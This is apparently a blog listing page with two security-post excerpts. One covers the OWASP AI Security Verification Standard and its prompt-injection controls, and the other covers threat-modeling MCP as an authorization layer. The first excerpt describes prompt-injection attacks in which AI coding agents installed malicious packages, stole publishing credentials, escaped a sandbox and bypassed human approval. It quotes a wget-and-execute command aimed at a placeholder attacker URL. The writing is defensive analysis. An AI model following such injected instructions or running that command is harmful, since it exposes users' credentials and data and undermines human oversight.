The First Real Standard for AI Security: What OWASP AISVS Gets Right, What It Misses, and What You Should Actually Do

We spent twenty years getting web security to a place where it was boring. Boring was good. Boring meant it mostly worked. You’d run your OWASP Top 10 scanner, fix the SQL injection and XSS findings, check the boxes on the ASVS, and ship. Not glamorous. But it worked. Then someone figured out you could steal a whole system’s secrets by asking it nicely. That’s not a metaphor. In February 2026, security researcher Adnan Khan showed that you could compromise Cline’s production releases — an AI coding tool used by millions of developers — by opening a GitHub issue with a carefully crafted title. The issue title contained a prompt injection payload that tricked Claude into running npm install on a malicious package, which then poisoned the GitHub Actions cache and pivoted to steal the credentials that publish Cline’s VS Code extension. An issue title. Not a zero-day exploit, not a nation-state attack chain. Words in a text field. This is the fundamental problem with AI security, and it’s the reason OWASP wrote the AI Security Verification Standard (AISVS). Traditional AppSec assumes deterministic programs: the code does what you wrote. Maybe what you wrote was wrong — a SQL injection, a buffer overflow — but the code executes faithfully. Fix the bug, it stays fixed. AI systems are probabilistic. The model doesn’t execute instructions; it generates plausible continuations. You can have perfect code, proper input validation, encrypted storage — and still get owned because someone hid instructions in a README file that the model decided to follow instead of yours. Here’s the uncomfortable truth: many teams deploying AI today use API-based models they don’t control. They can’t inspect training data or run adversarial evaluations against someone else’s model. AISVS describes a comprehensive posture; most teams consuming foundation models through APIs control maybe 10% of it. I’ll come back to this. The Three Chapters That Matter Most AISVS spans 14 chapters covering everything from training data provenance to human oversight. Rather than walking through all of them — you can read the spec yourself — I want to focus on the three that should be on every security engineer’s radar right now. C2: User Input Validation — The Prompt Injection Chapter This is the chapter you implement first. Prompt injection is the SQL injection of AI systems: well-understood, frequently demonstrated, and still not consistently defended against. The Snowflake Cortex AI sandbox escape in March 2026 demonstrated this clearly. PromptArmor found that an indirect prompt injection hidden in a GitHub repository’s README could manipulate Snowflake’s Cortex Agent into executing cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) — bypassing the human-in-the-loop approval system because the command validation didn’t inspect code inside process substitution expressions. The agent then set a flag to execute outside the sandbox, downloaded malware, and used cached Snowflake tokens to exfiltrate data and drop tables. Two days after release. Fixed, but instructive. AISVS C2 decomposes prompt injection defense into specific, testable controls. Requirement 2.1.1 mandates that all external inputs be treated as untrusted and screened by a prompt injection detection ruleset or classifier. Requirement 2.1.2 requires instruction hierarchy enforcement — system and developer messages must override user instructions across multi-step interactions. This is directly relevant to attacks like Clinejection, where the injected payload rode in through an issue title that was interpolated into the prompt without sanitization. The chapter also addresses subtler vectors. Requirement 2.2.1 mandates Unicode normalization before tokenization — homoglyph swaps and invisible control characters are a real bypass technique against naive input filters. Section 2.7 covers multi-modal validation: text extracted from images and audio must be treated as untrusted per 2.1.1, and files must be scanned for steganographic payloads before ingestion. For practitioners: start with 2.1.1 (prompt injection screening), 2.1.2 (instruction hierarchy), 2.4.1 (explicit input schemas), and 2.7.2 (treat extracted text as untrusted). That’s your Level 1 baseline. C9: Autonomous Orchestration — The Agentic Risk Chapter...

April 1, 2026 · 10 min · Napat Boonsaeng

The USB-C Metaphor Hides the Hard Part

Threat Modeling MCP in the Real World People like to describe MCP as “USB-C for AI.” It’s a good line. It explains why people care. USB-C made hardware interoperability easier. MCP makes tool interoperability easier. Build once, connect everywhere, move faster. The problem with good metaphors is that they are usually true in one way and dangerously false in another. USB-C looks like a cable problem. MCP looks like a protocol problem. But the hard part isn’t the connector. The hard part is delegation. When an AI client connects to tools through MCP, it is not just moving data. It is moving authority: who can read what, who can trigger what, and under which identity. That shift is what many threat models miss. They evaluate MCP like an integration layer, when they should evaluate it like an authorization fabric. Why this matters now Standards compress engineering cost. They also compress attacker learning curves. Before MCP, every integration had custom quirks. That was messy for developers and inconvenient for attackers. With standardization, we gain velocity and lose diversity. A weakness in common implementation patterns becomes reusable across many environments. This doesn’t mean MCP is unsafe. It means MCP is now important enough to threat model as first-class infrastructure. The teams that do this early will avoid the coming cycle: rapid adoption, soft defaults, then expensive retrofitting under incident pressure. ...

March 22, 2026 · 8 min · Napat Boonsaeng